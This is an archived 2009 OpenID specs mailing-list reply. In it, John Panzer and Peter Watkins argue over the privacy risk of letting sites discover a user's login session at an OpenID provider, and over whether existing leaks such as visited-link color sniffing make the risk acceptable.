Discovery of an OpenID session at an OP

John Panzer jpanzer at google.com
Mon Dec 14 23:06:20 UTC 2009


On Mon, Dec 14, 2009 at 1:36 PM, Peter Watkins <peterw at tux.org> wrote:

> On Mon, Dec 14, 2009 at 11:32:40AM -0800, John Panzer wrote:
> > On Mon, Dec 14, 2009 at 11:21 AM, Peter Watkins <peterw at tux.org> wrote:
>
> > > I
> > > don't want the data-hungry folks at Facebook noticing that I'm logged
> > > in to the Greenpeace or National Rifle Association unless I explicitly
> > > approve letting Facebook know that.
>
> > (Note that
> > even today, you may be able to use visited-link color hacks to determine
> > what OPs a user has recently frequented; statistically speaking you can
> > already get the information you're worried about.)
>
> I call that the "Grandfather Clause" Fallacy, and I see it pretty often.
> Your argument is that because there's already an exposure (due to
> unintentional consequence of DOM/Javascript interaction), it's OK to build
> new systems & specs that are known to have the flaw from day one. You're
> arguing that the privacy flaw exhibited in the link status checking should
> be "grandfathered" in.
>
> Why not raise the bar, and make the web a *better* place instaed of
> settling
> for today's lowest common denominator?
>

The part of my response that you cut out argued for exactly that.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.openid.net/pipermail/openid-specs/attachments/20091214/70cce194/attachment.htm>


More information about the specs mailing list